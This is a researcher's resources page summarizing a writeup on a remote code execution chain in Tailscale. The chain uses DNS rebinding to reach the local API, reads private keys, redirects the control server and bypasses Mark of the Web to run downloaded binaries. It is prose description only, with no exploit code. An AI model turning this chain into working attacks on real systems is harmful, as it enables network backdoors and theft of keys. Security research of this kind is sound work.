About  Project Blog Resources

Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

RCE in Tailscale, DNS Rebinding, and You- 1015

Emily TrauPosted 3 Years Ago
  • Tailscale is a mesh VPN service. A network connection is established with Wireguard to one another on demand. To execute the website code for a VPN user, it will use the V8 engine. The security features for connected to privileged sockets and the Same Origin Policy (SOP) apply as well.
  • The setup was vulnerable to DNS rebinding attacks. This means that although the original DNS request mapped to some domain, on the next DNS request it will map to something else. What would be good to map to? 127.0.0.1 or localhost of course!
  • Since we're now on the localhost, we have the permissions to all the API without any authentication. This gives us the ability to introspect and reconfigure the tailscaled binary used for configuring the service. What can we do with this issue? Accessing private keys from the node is possible with this.
  • Using the previous vulnerability, many other things can be hit. A PATCH request to the preferences API can be used to update the control plane server. This allows us backdoored access to the network that this computer is on. When using this URL, it is specified as a parameter to open up a web browser. This can be used to open arbitrary binaries from the internet; absolutely amazing.
  • The issue above has the Mark of the Web, meaning a user is asked whether or not this can be executed. The application can be configured for the proxy to NOT mark stuff with the Mark of the Web! This means we can download an executable to the local machine and use the previous bug to execute it without any other popups.
  • After getting code execution on the device, they go more into how the DNS rebinding affects different browsers and different operators systems. They learned that the attack they were using worked fine locally but NOT remotely because of the browser protections in Chrome. FireFox was exploitable from a remote context though.
  • The Tailscaled server runs a web server at 100.100.100.100. Since this isn't considered a private address, this is vulnerable to rebinding attacks. They also found that the PeerAPI was vulnerable to the rebinding as well. The security model of Tailscale says to use authentication based upon network position. This is not a great thing to do with the threat of DNS rebinding.
  • Overall, an interesting piece of research into the VPN and a good representation of the dangers of DNS rebinding. Good work!

Maxwell DulinEmail me!TwitterGithubAdminBlog RSS FeedResources RSS Feed